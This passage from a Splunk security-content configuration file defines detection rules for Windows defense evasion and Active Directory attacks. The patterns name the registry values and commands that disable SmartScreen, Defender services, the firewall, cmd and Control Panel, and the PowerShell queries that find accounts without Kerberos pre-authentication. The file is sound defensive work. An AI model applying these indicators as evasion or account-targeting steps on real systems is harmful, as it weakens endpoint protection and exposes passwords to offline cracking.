"impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following search identifies a modification of registry to disable the smartscreen protection of windows machine. This is windows feature provide an early warning system against website that might engage in phishing attack or malware distribution. This modification are seen in RAT malware to cover their tracks upon downloading other of its component or other payload. action.notable.param.rule_title = Disable Windows SmartScreen Protection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE Registry.registry_path IN ("*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SmartScreenEnabled", "*\\Microsoft\\Windows\\System\\EnableSmartScreen") Registry.registry_value_data IN ("Off", "0") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_smartscreen_protection_filter` [ESCU - Disabled Kerberos Pre-Authentication Discovery With Get-ADUser - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` commandlet with specific parameters. `Get-ADUser` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Get-ADUser` is used to query for domain users. With the appropiate parameters, Get-ADUser allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\ Red Teams and adversaries alike use may abuse Get-ADUSer to enumerate these accounts and attempt to crack their passwords offline. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` commandlet with specific parameters. `Get-ADUser` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Get-ADUser` is used to query for domain users. With the appropiate parameters, Get-ADUser allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\ Red Teams and adversaries alike use may abuse Get-ADUSer to enumerate these accounts and attempt to crack their passwords offline. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use search for accounts with Kerberos Pre Authentication disabled for legitimate purposes. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabled Kerberos Pre-Authentication Discovery With Get-ADUser - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["CISA AA23-347A", "Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Disabled Kerberos Pre-Authentication Discovery With Get-ADUser from $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabled Kerberos Pre-Authentication Discovery With Get-ADUser - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` commandlet with specific parameters. `Get-ADUser` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Get-ADUser` is used to query for domain users. With the appropiate parameters, Get-ADUser allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\ Red Teams and adversaries alike use may abuse Get-ADUSer to enumerate these accounts and attempt to crack their passwords offline. action.notable.param.rule_title = Disabled Kerberos Pre-Authentication Discovery With Get-ADUser action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-ADUser*" AND ScriptBlockText="*4194304*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_get_aduser_filter` [ESCU - Disabled Kerberos Pre-Authentication Discovery With PowerView - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet with specific parameters. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows Active Directory networks. As the name suggests, `Get-DomainUser` is used to identify domain users and combining it with `-PreauthNotRequired` allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\ Red Teams and adversaries alike use may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet with specific parameters. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows Active Directory networks. As the name suggests, `Get-DomainUser` is used to identify domain users and combining it with `-PreauthNotRequired` allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\ Red Teams and adversaries alike use may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use PowerView for troubleshooting action.escu.creation_date = 2022-05-03 action.escu.modification_date = 2022-05-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabled Kerberos Pre-Authentication Discovery With PowerView - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Disabled Kerberos Pre-Authentication Discovery With PowerView from $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabled Kerberos Pre-Authentication Discovery With PowerView - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558", "T1558.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet with specific parameters. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows Active Directory networks. As the name suggests, `Get-DomainUser` is used to identify domain users and combining it with `-PreauthNotRequired` allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\ Red Teams and adversaries alike use may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline. action.notable.param.rule_title = Disabled Kerberos Pre-Authentication Discovery With PowerView action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*Get-DomainUser*" AND ScriptBlockText="*PreauthNotRequired*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_powerview_filter` [ESCU - Disabling CMD Application - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin may disable this application for non technical user. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling CMD Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"] action.risk = 1 action.risk.param._risk_message = The Windows command prompt was disabled on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling CMD Application - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files. action.notable.param.rule_title = Disabling CMD Application action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_cmd_application_filter` [ESCU - Disabling ControlPanel - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to identify registry modification to disable control panel window. This technique is commonly seen in malware to prevent their artifacts , persistence removed on the infected machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to identify registry modification to disable control panel window. This technique is commonly seen in malware to prevent their artifacts , persistence removed on the infected machine. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin may disable this application for non technical user. action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling ControlPanel - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = The Windows Control Panel was disabled on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling ControlPanel - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to identify registry modification to disable control panel window. This technique is commonly seen in malware to prevent their artifacts , persistence removed on the infected machine. action.notable.param.rule_title = Disabling ControlPanel action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_controlpanel_filter` [ESCU - Disabling Defender Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This particular behavior is typically executed when an adversaries or malware gains access to an endpoint and beings to perform execution and to evade detections. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This particular behavior is typically executed when an adversaries or malware gains access to an endpoint and beings to perform execution and to evade detections. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable windows defender product action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling Defender Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Windows Registry Abuse", "RedLine Stealer"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling Defender Services - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Windows Registry Abuse", "RedLine Stealer"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This particular behavior is typically executed when an adversaries or malware gains access to an endpoint and beings to perform execution and to evade detections. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.notable.param.rule_title = Disabling Defender Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\System\\CurrentControlSet\\Services\\*" AND (Registry.registry_path IN("*WdBoot*", "*WdFilter*", "*WdNisDrv*", "*WdNisSvc*","*WinDefend*", "*SecurityHealthService*")) AND Registry.registry_value_name = Start Registry.registry_value_data = 0x00000004) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_defender_services_filter` [ESCU - Disabling Firewall with Netsh - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to identifies suspicious firewall disabling using netsh application. this technique is commonly seen in malware that tries to communicate or download its component or other payload to its C2 server. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to identifies suspicious firewall disabling using netsh application. this technique is commonly seen in malware that tries to communicate or download its component or other payload to its C2 server. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = admin may disable firewall during testing or fixing network problem. action.escu.creation_date = 2021-03-31 action.escu.modification_date = 2021-03-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling Firewall with Netsh - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = The Windows Firewall was disabled on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling Firewall with Netsh - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process= "*firewall*" (Processes.process= "*off*" OR Processes.process= "*disable*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_firewall_with_netsh_filter` [ESCU - Disabling FolderOptions Windows Feature - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to identify registry modification to disable folder options feature of windows to show hidden files, file extension and etc. This technique used by malware in combination if disabling show hidden files feature to hide their files and also to hide the file extension to lure the user base on file icons or fake file extensions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to identify registry modification to disable folder options feature of windows to show hidden files, file extension and etc. This technique used by malware in combination if disabling show hidden files feature to hide their files and also to hide the file extension to lure the user base on file icons or fake file extensions. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin may disable this application for non technical user. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling FolderOptions Windows Feature - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = The Windows Folder Options, to hide files, was disabled on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling FolderOptions Windows Feature - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to identify registry modification to disable folder options feature of windows to show hidden files, file extension and etc. This technique used by malware in combination if disabling show hidden files feature to hide their files and also to hide the file extension to lure the user base on file icons or fake file extensions. action.notable.param.rule_title = Disabling FolderOptions Windows Feature action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_folderoptions_windows_feature_filter` [ESCU - Disabling Net User Account - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify a suspicious command-line that disables a user account using the `net.exe` utility native to Windows. This technique may used by the adversaries to interrupt availability of such users to do their malicious act. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will identify a suspicious command-line that disables a user account using the `net.exe` utility native to Windows. This technique may used by the adversaries to interrupt availability of such users to do their malicious act. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-05-04 action.escu.modification_date = 2021-05-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling Net User Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified disabling a user account on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 42}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling Net User Account - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will identify a suspicious command-line that disables a user account using the `net.exe` utility native to Windows. This technique may used by the adversaries to interrupt availability of such users to do their malicious act. action.notable.param.rule_title = Disabling Net User Account action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` AND Processes.process="*user*" AND Processes.process="*/active:no*" by Processes.process_name Processes.original_file_name Processes.dest Processes.user Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_net_user_account_filter` [ESCU - Disabling NoRun Windows App - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to identify modification of registry to disable run application in window start menu. this application is known to be a helpful shortcut to windows OS user to run known application and also to execute some reg or batch script. This technique is used malware to make cleaning of its infection more harder by preventing known application run easily through run shortcut. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to identify modification of registry to disable run application in window start menu. this application is known to be a helpful shortcut to windows OS user to run known application and also to execute some reg or batch script. This technique is used malware to make cleaning of its infection more harder by preventing known application run easily through run shortcut. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin may disable this application for non technical user. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disabling NoRun Windows App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = The Windows registry was modified to disable run application in window start menu on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disabling NoRun Windows App - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": 